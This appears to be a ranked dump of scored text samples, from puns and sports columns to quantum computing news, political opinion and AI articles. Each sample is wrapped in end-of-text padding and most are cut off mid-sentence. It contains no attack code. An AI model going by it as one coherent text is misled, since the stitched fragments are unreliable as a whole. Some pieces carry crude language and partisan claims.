Score = 806912.0 +<|begin_of_text|>Fun with Verbs and Nouns! + +I adore a door I abhor a bore I oppose a pose The ketchup will catch up The mustard must turd Here, I shall focus on a faux cus: A faux cus is a fake swear word, like, “diddlepoody”. I accrue a crew I attack a tack I can afford a Ford I acquire a choir My specialty is special tea + +And now, for some left over word oddities: + +Why do we write things down but type things up? Of course you can get written up if you’ve been a bad type at work. + +It was a tired, retired tire, attired entirely in tie-dyed Thai ties. + +Alternative spellings & meanings: + +Explain means to get off the plane, at least when it’s written explane. + +Refer is what my dog does right after he sheds, only it’s written refur. + +And finally: + +I was cooking strained peas the other day, but they got out of control and I had to restrain them. + +Thank you and good night; you’ve been a wonderful audience. + +— + +Click on this daisy for some more word fun:<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 31; Score = 802816.0 +<|begin_of_text|>This is how it starts: It's Thursday afternoon and I'm sitting on a sunny beach terrace nursing a glass of chilled wine when my phone shudders with a missile launched from the lilywhite land of Kildare. It's John. Twitter. He's not happy: "No comment from @PaulKimmage either about the Irish boxing positive, strange considering he targets other countries' athletes with glee." + +This is how it starts: It's Thursday afternoon and I'm sitting on a sunny beach terrace nursing a glass of chilled wine when my phone shudders with a missile launched from the lilywhite land of Kildare. It's John. Twitter. He's not happy: "No comment from @PaulKimmage either about the Irish boxing positive, strange considering he targets other countries' athletes with glee." + +My apologies, John, what would you like me to say? + +"I'm shocked." + +But I'm not shocked. + +"I'm angry." + +I'm not angry. + +"Michael O'Reilly has disgraced our country." + +That's not how I feel. + +You see, to be shocked or angry or indignant you have to care, John. And I don't care. I don't care for the Olympic Games. I don't care for the Olympic values. I don't care for the Olympic anthem. I don't care for the Olympic flame. I don't care for the Opening Ceremony, or the Closing Ceremony, or the medals table. + +I don't care. + +I keep hearing that I should care. I keep hearing that the Olympics still matter. I keep being told to accentuate the positive, not the negative, and that we've got great people there - Sinead and Claire and Sanita and Fionnuala and Pádraig and Paddy and Michael and Leona and Gary and Paul and Ciara, to name a few - and that if the Olympics matter to them, they should matter to us. + +That's fair. But you can't tell people what they should and should not feel. They either feel it or they don't. They either buy it or they don't. + +And I don't. + +I'm not buying Thomas Bach. I'm not buying Craig Reedie. I'm not buying Pat Hickey or Dick Pound or Seb Coe. I'd rather have Citius, Altius, Fortius tattooed to my wrinkled penis with a rusty nail than to have anything to do with the Lords of the Rings or their circus. That's why +================================================================================ +Rank = 32; Score = 786432.0 +<|begin_of_text|>Photo + +Google and a corporation associated with NASA are forming a laboratory to study artificial intelligence by means of computers that use the unusual properties of quantum physics. Their quantum computer, which performs complex calculations thousands of times faster than existing supercomputers, is expected to be in active use in the third quarter of this year. + +The Quantum Artificial Intelligence Lab, as the entity is called, will focus on machine learning, which is the way computers take note of patterns of information to improve their outputs. Personalized Internet search and predictions of traffic congestion based on GPS data are examples of machine learning. The field is particularly important for things like facial or voice recognition, biological behavior, or the management of very large and complex systems. + +“If we want to create effective environmental policies, we need better models of what’s happening to our climate,” Google said in a blog post announcing the partnership. “Classical computers aren’t well suited to these types of creative problems.” + +Google said it had already devised machine-learning algorithms that work inside the quantum computer, which is made by D-Wave Systems of Burnaby, British Columbia. One could quickly recognize information, saving power on mobile devices, while another was successful at sorting out bad or mislabeled data. The most effective methods for using quantum computation, Google said, involved combining the advanced machines with its clouds of traditional computers. + +Google bought the machine in cooperation with the Universities Space Research Association, a nonprofit research corporation that works with NASA and others to advance space science and technology. Outside researchers will be invited to the lab as well. + +This year D-Wave sold its first commercial quantum computer to Lockheed Martin. Lockheed officials said the computer would be used for the test and measurement of things like jet aircraft designs, or the reliability of satellite systems. + +The D-Wave computer works by framing complex problems in terms of optimal outcomes. The classic example of this type of problem is figuring out the most efficient way a traveling salesman can visit 10 customers, but real-world problems now include hundreds of such variables and contingencies. D-Wave’s machine frames the problem in terms of energy states, and uses quantum physics to rapidly determine an outcome that satisfies the variables with the least use of energy. + +In tests last September, an independent researcher found that for some types of problems the quantum computer was 3,600 times faster than traditional supercomputers. According to a D-Wave official, the machine performed even better in Google’s tests, which involved 500 variables with different constraints. + +“The tougher, more complex ones had better performance,” said Colin Williams +================================================================================ +Rank = 33; Score = 778240.0 +<|begin_of_text|>In his New York Post column, Ralph Peters defended the controversial Arizona immigration law in part by citing "soaring crime rates in our border states." However, crime rates in Arizona -- as well as crime rates for each state bordering Mexico -- have dropped during the past decade. + +Peters defends AZ law in part by citing "soaring crime rates in our border states" + +From Peters' April 29 New York Post column: + +Our ruling class simply doesn't feel the pain. So the DC elite demonizes Arizona's desperate effort to shove the narco-revolution's disorder back across the border. Murdered ranchers, overwhelmed emergency rooms and soaring crime rates in our border states mean less to the White House than a terrorist detainee's claims of abuse. + +In fact, according to BJS, crime rates in border states have dropped during past decade + +Crime rates in Arizona at lowest point in decades. According to the Bureau of Justice Statistics (BJS), the violent crime rate in Arizona was lower in 2006, 2007, and 2008 -- the most recent year from which data are available -- than any year since 1983. The property crime rate in Arizona was lower in 2006, 2007, and 2008 than any year since 1968. In addition, in Arizona, the violent crime rate dropped from 577.9 per 100,000 population in 1998 to 447 per 100,000 population in 2008; the property crime rate dropped from 5,997 to 4,291 during the same period. During the same decade, Arizona's undocumented immigrant population grew rapidly. The Arizona Republic reported: "Between January 2000 and January 2008, Arizona's undocumented population grew 70 percent, according to the DHS [Department of Homeland Security] report. Nationally, it grew 37 percent." + +Crime rates have dropped during past decade in other border states. The BJS data further show that violent crime rates and property crime rates in California, New Mexico, and Texas dropped from 1998 through 2008 -- the most recent year from which data are available: + +In California, the violent crime rate dropped from 703.7 in 1998 to 503.8 in 2008; the property crime rate dropped from 3,639.1 to 2,940.3 during the same period. + +In New Mexico, the violent crime rate dropped from 961.4 in 1998 to 649.9 in 200 +================================================================================ +Rank = 34; Score = 774144.0 +<|begin_of_text|>Sunflowers and other plants bloom in front of the Arkansas State Capitol in Little Rock. (Danny Johnston/AP) + +Plants can't feel pain or hunger like animals, but their cells can communicate stress in a way that's not so different from what animals do, scientists have found. + +The finding, published this week in Nature Communication, shows that plants use a compound — the same compound used as an essential neurotransmitter in animal brains — to create electrical signals that regulate growth when facing drought, viruses or extreme temperatures. + +In other words, this is how plants manage stress without having a central nervous system. + +[Scientists find the single letter in corn’s DNA that spurred its evolution] + +As opposed to animals, which have long lines of nerve cells to shoot messages across an organism, this discovery suggests that there's a cell-to-cell communication in plants that's just intrinsically a part of all plant tissues. + +"Plant cells are not very isolated," said Jose Feijo, a contributor to the study's research team out of Australia and a professor at the University of Maryland. "[The neurotransmitter] is able to shuttle from one cell to another pretty rapidly." + +The discovery may lead to medical applications and technology to make crops more resilient, but it also offers insight into how plants have become what they are today. The researchers theorize that plant cells took the neurotransmitter, called gamma-aminobutyric acid or GABA, and "co-opted it" to be a useful communication tool. + +"Evolution is a tinkering process — it's not really a design," Feijo said. "From an evolutionary standpoint, this makes sense." + +[Can plants hear? In a study, vibrations prompt some to boost their defenses] + +While the compound is exactly the same among plants and animals, the proteins that bind to it are very different within the two kingdoms of life. This means that plants and animals evolved their use of the compound as a messenger separately from one another. + +That poses some important questions for further research: How do more ancient plant species, such as ferns, use this compound? And how did this communication system develop? + +Scientists suggest that those questions could lead to ways to fight off viruses in plants, helping the efforts against food insecurity. It might also reveal why particular plant-derived drugs that rely on the GABA-signaling system, such as sedatives and anti-epileptics, work in humans. + +Read more: + +Scientists are closing in on the ultimate secrets of plant photosynthesis + +Squirrel gets ‘drunk’, causes hundreds of dollars in +================================================================================ +Rank = 35; Score = 770048.0 +<|begin_of_text|>The combat code of the US Military is that we don’t abandon our dead or wounded on the battlefield. In US Air Force lingo, fighter pilots don’t run off and leave their wingmen. If one of our own is shot down, still alive and not yet in enemy captivity, we will either come to get him or die trying. Among America’s fighting forces, the calm, sure knowledge that such an irrevocable bond exists is priceless. Along with individual faith and personal grit, it is a sacred trust that has often sustained hope in the face of terribly long odds. + +The disgraceful abandonment of our Ambassador and those brave ex-SEALs who fought to their deaths to save others in that compound is nothing short of dereliction-of-duty. Additionally, the patently absurd cover-up scenario that was fabricated in the aftermath was an outright lie in attempt to shield the President and the Secretary of State from responsibility. + +It has been over eight months since the attack on our compound in Benghazi. The White House strategy, with the aid of a “lap dog press” has been to run out the clock before the truth is forthcoming. The recent testimonies of the three “whistle blowers” have reopened the subject and hopefully will lead to exposure and disgrace of those responsible for this embarrassing debacle. + +It would appear that the most recent firewall which the Administration is counting on is the contention that there were simply no military assets that could be brought to bear in time to make a difference… mainly due to the unavailability of tanker support for fighter aircraft. This is simply BS, regardless how many supposed “experts” the Administration trot out to make such an assertion. The bottom line is that even if the closest asset capable of response was half-way around the world, you don’t just sit on your penguin *** and do nothing. The fact is that the closest asset was not half-way around the world, but as near as Aviano Air Base, Italy where two squadrons of F-16Cs are based. + +Consider the following scenario (all times Benghazi local): + +When Hicks in Tripoli receives a call at 9:40 PM from Ambassador Stevens informing him “Greg, we are under attack!” (his last words), he immediately notifies all agencies and prepares for the immediate initiation of an existing “Emergency Response Plan.” At AFRICON, General Carter Ham attempts to mount a rescue effort, but is told to “stand down.” By 10:30 PM an unarmed drone is overhead the compound and streaming live feed to various Command +================================================================================ +Rank = 36; Score = 753664.0 +<|begin_of_text|>Back in 2013, Google and NASA went halvsies on a D-Wave X2 computing system. The D-Wave is supposedly the world's first functional quantum computer, though experts both within and without the company have never been able to conclusively prove that the machine actually taps into the quantum realm to produce its calculations. That is, until now. + +Google's announcement Wednesday centers on "quantum annealing", a technique that determines the global minimum for a given function when presented with a set of potential solutions. In English, it figures out the best (ie most efficient) overall course of action to complete a task when given a set number of options. Scientists have been working on quantum annealers for a while now, though the two primary techniques, "simulated annealing" and "quantum monte carlo" are both just simulated systems running on conventional hardware. The D-Wave system, on the other hand, is hard-coded to run the quantum annealing algorithm on its quantum array. + +The company recently tested the new QA algorithm in a proof-of-concept trial against conventional systems running the simulated annealing and monte carlo methods. The results are more than impressive. As you can see from the graph above, Google's method beat out the other two quite handily, solving a function with 1000 binary variables up to 100 million times faster. + +Google qualified these results as "intriguing and very encouraging" in its announcement, though the company has a long way to go before this research is ready for the consumer market. But once it is, hoo boy, get ready for a technological revolution. With it, AI researchers may be able to develop smarter, more responsive computer learning systems, NASA could use it to simulate rocket launches (or entire space missions) -- heck even the mundane material sciences could get a boost from this technology.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 37; Score = 729088.0 +<|begin_of_text|>This list has been expanded into the new book, "Wired to Create: Unravelling the Mysteries of the Creative Mind," by Carolyn Gregoire and Scott Barry Kaufman. + +Creativity works in mysterious and often paradoxical ways. Creative thinking is a stable, defining characteristic in some personalities, but it may also change based on situation and context. Inspiration and ideas often arise seemingly out of nowhere and then fail to show up when we most need them, and creative thinking requires complex cognition yet is completely distinct from the thinking process. + +Neuroscience paints a complicated picture of creativity. As scientists now understand it, creativity is far more complex than the right-left brain distinction would have us think (the theory being that left brain = rational and analytical, right brain = creative and emotional). In fact, creativity is thought to involve a number of cognitive processes, neural pathways and emotions, and we still don't have the full picture of how the imaginative mind works. + +And psychologically speaking, creative personality types are difficult to pin down, largely because they're complex, paradoxical and tend to avoid habit or routine. And it's not just a stereotype of the "tortured artist" -- artists really may be more complicated people. Research has suggested that creativity involves the coming together of a multitude of traits, behaviors and social influences in a single person. + +"It's actually hard for creative people to know themselves because the creative self is more complex than the non-creative self," Scott Barry Kaufman, a psychologist at New York University who has spent years researching creativity, told The Huffington Post. "The things that stand out the most are the paradoxes of the creative self... Imaginative people have messier minds." + +While there's no "typical" creative type, there are some tell-tale characteristics and behaviors of highly creative people. Here are 18 things they do differently. + +They daydream. + +Creative types know, despite what their third-grade teachers may have said, that daydreaming is anything but a waste of time. + +According to Kaufman and psychologist Rebecca L. McMillan, who co-authored a paper titled "Ode To Positive Constructive Daydreaming," mind-wandering can aid in the process of "creative incubation." And of course, many of us know from experience that our best ideas come seemingly out of the blue when our minds are elsewhere. + +Although daydreaming may seem mindless, a 2012 study suggested it could actually involve a highly engaged brain state -- daydreaming can lead to sudden connections and insights +================================================================================ +Rank = 38; Score = 720896.0 +<|begin_of_text|>by Thomas R. Wells + +Some countries are assholes. They trample on international norms about human rights, maritime boundaries, climate change conventions, and so on. They repeatedly make and break promises and then complain indignantly and even violently if they are challenged for it. They bully weaker countries shamelessly to get their way, all the while declaring their commitment to the highest ideals of international peace and justice. + +You know the kind of country I'm talking about. The kind that believes in its own moral exceptionalism: Not only does it not feel bound by the ordinary rules; it even demands that other countries acknowledge its moral right to set its interests above their own or the international peace. Take Russia. Its behaviour in Ukraine (and elsewhere in recent years) is classic assholism and is systematic and comprehensive enough to warrant the conclusion that Russia is a true asshole nation. I'm sure you can think of others. + +I + +The term “asshole nation” is inspired by Aaron James's neat little book Assholes: A Theory in which he defines the asshole individual as someone who in interpersonal or cooperative relations, + +1. allows himself to enjoy special advantages and does so systematically; + +2. does this out of an entrenched sense of entitlement; and + +3. is immunized by his sense of entitlement against the complaints of other people. (p.5) + +James' theory is directed at the anti-social behaviour of individuals. It covers much of the same ground that organizational psychologists have mapped as the ‘dark triad' of anti-social personality types – narcissism, Machiavellianism, and sub-clinical psychopathy – which will be unfortunately familiar to most people who have worked in any large organization. But James adds two things. First, his account is a thoroughly moral one: the asshole is morally repugnant because of his fundamental lack of respect for the moral status of those he interacts with: He doesn't register other people as morally real. Second, because James' account starts from the moral requirements of participation in cooperative relations rather than from human psychology it is more general than that produced by organisational psychologists. I believe it can also be helpfully applied to non-human agents, such as countries. + +Just as some individuals seem to think that every day is their birthday and they deserve special consideration from everyone else – and a general exemption from rules intended for the general benefit which happen to be inconvenient to them, like using their phone in the movie theatre or speeding through school zones when they're running late – so some countries seem to think that +================================================================================ +Rank = 39; Score = 716800.0 +<|begin_of_text|>It’s been a while we haven’t covered any machine learning algorithm. Last time we discussed the Markov Decision Process (or MDP). + +Today we’re going to build our knowledge on top of the MDP and see how we can generalise our MDP to solve more complex problems. + +Reinforcement learning really hit the news back in 2013 when a computer learned how to play a bunch of old Atari games (like Breakout) just by observing the pixels on the screen. Let’s find out how this is possible! + +In Breakout the goal is to destroy all the bricks at the top of the screen by bouncing a ball over a paddle that you can move horizontally at the bottom of the screen. Every time the ball hits a brick your score increases. + +The idea + +If we want to teach a computer how to play that game, one solution might be to use a classifier such as a neural network where the input would be the screen images and the output the action to perform. It makes sense as for each screen we want to know if the paddle should move left or right (or stay still). The problem is that we need lots of training examples. But this is not how we learn! We don’t want someone to tell us a million time what we should do! + +Instead we learn by observing the reward we get as a consequence of our actions. This is the essence of reinforcement learning. An agent (the player) performs some actions which change the state of the environment (the pixels on the screen) and gets a reward for his actions (increase of score). + +Reinforcement learning lies somewhere between supervised and unsupervised learning. In supervised learning we have a label for every training example and in unsupervised learning there is no label at all. In reinforcement learning we have rewards which are sparse and time-delayed labels. Using only on those rewards the agent has to learn to behave in the environment. + +It may seem simple but there are some challenges along the way. When the ball hits a brick it has nothing to do with the action you just take. In fact it was the action performed when the ball bounced on the paddle that sent the ball against the brick. The problem of identifying which action is at the origin of the reward is known as the credit assignment problem. + +Markov Decision Process + +Doesn’t it sound familiar? Indeed, it looks quite similar to our tiny robot example we use to illustrate the MDP. + +The robot (the agent) moves (take actions) and gets a reward as it moves closer to +================================================================================ +Rank = 40; Score = 716800.0 +<|begin_of_text|>Setting Edit + +The series depicts a future in which Earth is dominated by artificial intelligence that was created early in the 21st century and rebelled against humanity. At one point, humans attempted to block out the machines' source of solar power by covering the sky in thick, stormy clouds. During this time, the machines and mankind were engaged in a massive war in which the machines ultimately emerged the victor. Having no definite source of energy, the machines devised a way to extract humans' bioelectricity and thermal energy by growing people in pods, while their minds are controlled by cybernetic implants connecting them to a simulated reality called the Matrix. The virtual reality world simulated by the Matrix resembles human civilization around the turn of the 21st century (this time period was chosen because it is supposedly the pinnacle of human civilization). The majority of the stories in the Matrix franchise take place in a vast Western World unnamed megacity. This environment is practically indistinguishable from reality (although scenes set within the Matrix are presented on-screen with a green tint to the footage, and a general bias towards the color green), and the majority of bluepills - humans connected to the Matrix - are unaware of its true nature. Most of the central characters in the series are able to gain superhuman abilities within the Matrix by taking advantage of their understanding of its true nature to manipulate its virtual physical laws. The virtual world is first introduced in The Matrix. The Animatrix short film "The Second Renaissance" and the short comic Bits and Pieces of Information show how the initial conflict between humans and machines came about, and how and why the Matrix was first developed. Its history and purpose are further explained in The Matrix Reloaded. + +Films Edit + +Cast Edit + +Crew Edit + +The Ultimate Matrix Collection Edit + +In 2004, Warner Home Video released The Ultimate Matrix Collection, a ten-disc set of the films on DVD. It included all three films, The Animatrix, and six discs of additional material, including the documentary film The Matrix Revisited, the live action footage shot for Enter the Matrix, and a promotional compilation of The Matrix Online. For this release, The Matrix was remastered under the supervision of the Wachowskis and Bill Pope to improve its picture quality and make its coloring closer to that of its sequels. At the request of the Wachowskis, as they explain in a written statement that accompanies the boxset, each of the three films is accompanied by two audio commentaries, one by philosophers who liked +================================================================================ +Rank = 41; Score = 712704.0 +<|begin_of_text|>Tom Taylor is a candidate for Utah’s 4th Congressional District. To show your support, consider a donation at www.tomforutah.com, like him on Facebook (TomForUtah), or follow him on Twitter @TomForUtah. + +As I went through the Ph.D program in robotics at the University of Utah, I spent a lot of time thinking about automation, artificial intelligence, and the roles these technologies would play in the future. We are on the precipice of seeing radical change to our economy. Unfortunately, when most people think about automation, the first visual most people think of is a robot with personality like Wall-E or C-3PO. The truth is automation can come in a lot of different forms like self-driving vehicles, or software that quietly does the work for us that millions used to do a decade before. Self-driving vehicles alone have the potential to wipe out over 4 million jobs. Advanced software practices like machine learning are arguably more potentially disruptive being able to replace radiology jobs like analyzing CT scans and X-Rays. Legal work, music composition, and even software developers could also be on the chopping block. + +History has shown us that automation creates new jobs where previous ones were lost. Is there any reason to believe that “this time is different?” Yes, in fact, there is. There are two main factors that make the upcoming automation disruption concerning. First, the speed with which automation is likely to displace jobs is unprecedented. Second, we are seeing a trend in our economy where new technologies aren’t bringing enough gains in productivity to offset the gains that are going purely to capital — in other words, right now jobs are simply being replaced with machines instead of creating new and better career paths. These economic indicators predict that if we don’t do something about this, we could find ourselves in a world of mass unemployment, where the middle class has disappeared, and all of the money is concentrated in the hands of very few. + +Despite these concerns, it is the wrong idea to fight automation. Instead, we should embrace automation and change the structure of our economy so that we can all reap the benefits. Automation has the potential to lead to an increase of freedom in our lives where our lives aren’t dominated by banal tasks and we can choose the projects we work on. Imagine a world where the core necessities of life were completely taken care of by machines. Our food production could be completely automated where robots cultivate our farms, load the harvest on a self-driving truck which then delivers the food to a sorting facility +================================================================================ +Rank = 42; Score = 708608.0 +<|begin_of_text|>Image: Eneas De Troya + +Common sense is a funny thing. It's here that we as people co-existing within a given society reach unsaid agreements on basic features and interpretations of the world, whether "we" like it or not. It's a very conservative notion for one, arguably acting as a drag force on societal evolution, and one that marginalizes by definition. But it's also in a sense a living history of the present, the contested Wikipedia entry that is a collection of people trying to understand itself through often ugly and dated axioms. It may even be necessary for human reasoning. + +What the hell could this possibly have to do with computer science? Ramon Lopez de Mantaras, director of the Spanish National Research Council's Artificial Intelligence Research Institute, believes that one of the central tasks in creating human-like artificial intelligence is in teaching machines common sense, or something a lot like it. "In the last 30 years, research has focused on weak artificial intelligence—that is to say, in making machines very good at a specific topic—but we have not progressed that much with common sense reasoning," he posited in a recent debate, according to IT Iberia's Anna Solana. General or common sense reasoning, the argument goes, is key to understanding the unanticipated, which is key to real intelligence. + +Like many if not most artificial intelligence researchers, Lopez de Mantaras is dismissive of the "singularity," the highly sketchy notion that at some point in the near future machines will acquire the ability to simulate human brains, opening up a brave new world in which machines and humans can trade places, with all sorts of neat and scary science-fictional outcomes. Part of the problem, he argues, is that the brain is not exclusively an electrical device and additionally involves very analog and poorly modeled chemical processes. The other part is that no one has really figured out how to program common sense. We can teach a computer the axioms of geometry—that, say, two points exist on a line—but not so much those of society. + +Speaking at a conference a couple of years ago in Barcelona, Lopez de Mantaras offered a very clear definition of the common sense problem and its implications. "The dominant model at the present time is the digital computer, though the World Wide Web has recently been proposed as a possible model for artificial intelligence, particularly to solve the main problem faced by artificial intelligence: acquiring commonsense knowledge," he said. "This knowledge is not generally found in books or encyclopedias and yet we all +================================================================================ +Rank = 43; Score = 696320.0 +<|begin_of_text|>Autonomous cars can currently perform most of the basic driving tasks, like switching lanes or parking, but avoiding an oncoming vehicle or avoiding an animal on the road is still too complex for most systems. + +That is why Georgia Tech has built two rally trucks, 20 percent the size of normal trucks, to test some of the irregular events that happen on roads. + +See also: Semi-autonomous car hits new record at Indy track + +A team of researchers from the Daniel Guggenheim School of Aerospace Engineering and the School of Interactive Computing worked on the autonomous track, called the AutoRally. + +Reaching a top speed of 20 mph – the equivalent of 90 mph at full size – the team could test multiple events at different speeds. The cars start to learn and adjust to the barriers on the road, learning how to avoid them. + +The AutoRally trucks are fitted with a CPU, GPS, battery, and swarth of cameras and sensors to calculate “up to 2000 possibilities in 50 milliseconds.” The team’s goal is to make the truck react as quickly as a human would to complex situations. + +Autonomous tech still not up to quick reflexes? + +The inability to react to an unfamiliar situation is one of the main reasons people are still unsure about autonomous cars. In a new study from the University of Michigan, public perception of self-driving is still quite bad, with a lot of people cautious or against computers controlling cars — a study in the U.K. produced similar results. + +Georgia Tech already provides all of its research and code online, allowing companies currently testing autonomous cars to try out the system in regular cars. + +Google, the company that has worked the longest on self-driving, has been actively avoiding crashes, at least in public. It reported two crashes in California last month, both of which were caused by human error, though we have seen evidence of the autonomous car causing a crash.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|>